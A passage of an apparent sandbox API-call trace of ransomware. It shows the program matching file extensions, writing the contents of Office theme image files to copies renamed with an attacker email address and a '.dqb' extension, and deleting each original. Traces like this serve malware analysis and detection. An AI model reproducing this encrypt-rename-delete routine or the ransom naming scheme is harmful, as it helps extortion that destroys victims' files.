Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.921] lstrlenW (lpString=".dbf") returned 4 [0043.921] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.921] lstrlenW (lpString=".1cd") returned 4 [0043.921] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.921] lstrlenW (lpString=".jpg") returned 4 [0043.921] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.921] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.921] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.924] GetLastError () returned 0x0 [0043.924] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1400, lpOverlapped=0x0) returned 1 [0043.925] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0043.926] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.926] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.926] SetEndOfFile (hFile=0x200) returned 1 [0043.926] CloseHandle (hObject=0x200) returned 1 [0043.926] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.926] SetEndOfFile (hFile=0x17c) returned 1 [0043.927] CloseHandle (hObject=0x17c) returned 1 [0043.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.927] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1 [0043.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.927] lstrlenW (lpString=".doc") returned 4 [0043.927] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.927] lstrlenW (lpString=".docx") returned 5 [0043.927] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.927] lstrlenW (lpString=".pdf") returned 4 [0043.927] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.927] lstrlenW (lpString=".xls") returned 4 [0043.927] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.928] lstrlenW (lpString=".xlsx") returned 5 [0043.928] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.928] lstrlenW (lpString=".ppt") returned 4 [0043.928] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.928] lstrlenW (lpString=".zip") returned 4 [0043.928] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.928] lstrlenW (lpString=".rar") returned 4 [0043.928] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.928] lstrlenW (lpString=".bz2") returned 4 [0043.928] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.928] lstrlenW (lpString=".7z") returned 3 [0043.928] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.928] lstrlenW (lpString=".dbf") returned 4 [0043.928] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.928] lstrlenW (lpString=".1cd") returned 4 [0043.928] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0043.928] lstrlenW (lpString=".jpg") returned 4 [0043.928] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.929] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=60724) returned 1 [0043.929] CloseHandle (hObject=0x17c) returned 1 [0043.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20 [0043.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.929] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.929] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.930] GetLastError () returned 0x0 [0043.930] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xed34, lpOverlapped=0x0) returned 1 [0043.932] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xed40, lpOverlapped=0x0) returned 1 [0043.933] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.933] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.934] SetEndOfFile (hFile=0x200) returned 1 [0043.934] CloseHandle (hObject=0x200) returned 1 [0043.934] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.934] SetEndOfFile (hFile=0x17c) returned 1 [0043.935] CloseHandle (hObject=0x17c) returned 1 [0043.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.935] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0043.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.935] lstrlenW (lpString=".doc") returned 4 [0043.935] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.935] lstrlenW (lpString=".docx") returned 5 [0043.935] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.935] lstrlenW (lpString=".pdf") returned 4 [0043.935] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.935] lstrlenW (lpString=".xls") returned 4 [0043.935] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.935] lstrlenW (lpString=".xlsx") returned 5 [0043.935] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.935] lstrlenW (lpString=".ppt") returned 4 [0043.935] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.936] lstrlenW (lpString=".zip") returned 4 [0043.936] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.936] lstrlenW (lpString=".rar") returned 4 [0043.936] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.936] lstrlenW (lpString=".bz2") returned 4 [0043.936] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.936] lstrlenW (lpString=".7z") returned 3 [0043.936] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.936] lstrlenW (lpString=".dbf") returned 4 [0043.936] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.936] lstrlenW (lpString=".1cd") returned 4 [0043.936] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0043.936] lstrlenW (lpString=".jpg") returned 4 [0043.936] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.936] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.936] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.433] GetLastError () returned 0x0 [0044.433] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x9f8, lpOverlapped=0x0) returned 1 [0044.445] WriteFile (in: hFile=0x174, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0044.446] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.446] WriteFile (in: hFile=0x174, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.446] SetEndOfFile (hFile=0x174) returned 1 [0044.446] CloseHandle (hObject=0x174) returned 1 [0044.446] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.446] SetEndOfFile (hFile=0x17c) returned 1 [0044.447] CloseHandle (hObject=0x17c) returned 1 [0044.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.447] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1 [0044.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.447] lstrlenW (lpString=".doc") returned 4 [0044.447] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.447] lstrlenW (lpString=".docx") returned 5 [0044.447] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.447] lstrlenW (lpString=".pdf") returned 4 [0044.447] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.448] lstrlenW (lpString=".xls") returned 4 [0044.448] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.448] lstrlenW (lpString=".xlsx") returned 5 [0044.448] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.448] lstrlenW (lpString=".ppt") returned 4 [0044.448] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.448] lstrlenW (lpString=".zip") returned 4 [0044.448] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.448] lstrlenW (lpString=".rar") returned 4 [0044.448] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.448] lstrlenW (lpString=".bz2") returned 4 [0044.448] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.448] lstrlenW (lpString=".7z") returned 3 [0044.448] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.448] lstrlenW (lpString=".dbf") returned 4 [0044.448] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.448] lstrlenW (lpString=".1cd") returned 4 [0044.448] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0044.448] lstrlenW (lpString=".jpg") returned 4 [0044.448] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.449] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.449] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.457] GetLastError () returned 0x0 [0044.457] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x682, lpOverlapped=0x0) returned 1 [0044.466] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x690, lpOverlapped=0x0) returned 1 [0044.467] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.467] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.467] SetEndOfFile (hFile=0x210) returned 1 [0044.467] CloseHandle (hObject=0x210) returned 1 [0044.467] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.467] SetEndOfFile (hFile=0x17c) returned 1 [0044.468] CloseHandle (hObject=0x17c) returned 1 [0044.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.468] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString=".doc") returned 4 [0044.469] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.469] lstrlenW (lpString=".docx") returned 5 [0044.469] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.469] lstrlenW (lpString=".pdf") returned 4 [0044.469] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.469] lstrlenW (lpString=".xls") returned 4 [0044.469] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.469] lstrlenW (lpString=".xlsx") returned 5 [0044.469] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.469] lstrlenW (lpString=".ppt") returned 4 [0044.469] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString=".zip") returned 4 [0044.469] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.469] lstrlenW (lpString=".rar") returned 4 [0044.469] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.469] lstrlenW (lpString=".bz2") returned 4 [0044.469] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.469] lstrlenW (lpString=".7z") returned 3 [0044.469] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString=".dbf") returned 4 [0044.469] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString=".1cd") returned 4 [0044.469] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0044.469] lstrlenW (lpString=".jpg") returned 4 [0044.469] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.470] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=19563) returned 1 [0044.470] CloseHandle (hObject=0x17c) returned 1 [0044.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20 [0044.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.470] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.470] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.470] GetLastError () returned 0x0 [0044.470] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4c6b, lpOverlapped=0x0) returned 1 [0044.476] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4c70, lpOverlapped=0x0) returned 1 [0044.478] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.478] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.478] SetEndOfFile (hFile=0x210) returned 1 [0044.478] CloseHandle (hObject=0x210) returned 1 [0044.478] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.478] SetEndOfFile (hFile=0x17c) returned 1 [0044.479] CloseHandle (hObject=0x17c) returned 1 [0044.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.479] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0044.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.479] lstrlenW (lpString=".doc") returned 4 [0044.479] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.479] lstrlenW (lpString=".docx") returned 5 [0044.479] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.479] lstrlenW (lpString=".pdf") returned 4 [0044.480] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.480] lstrlenW (lpString=".xls") returned 4 [0044.480] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.480] lstrlenW (lpString=".xlsx") returned 5 [0044.480] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.480] lstrlenW (lpString=".ppt") returned 4 [0044.480] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.480] lstrlenW (lpString=".zip") returned 4 [0044.480] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.480] lstrlenW (lpString=".rar") 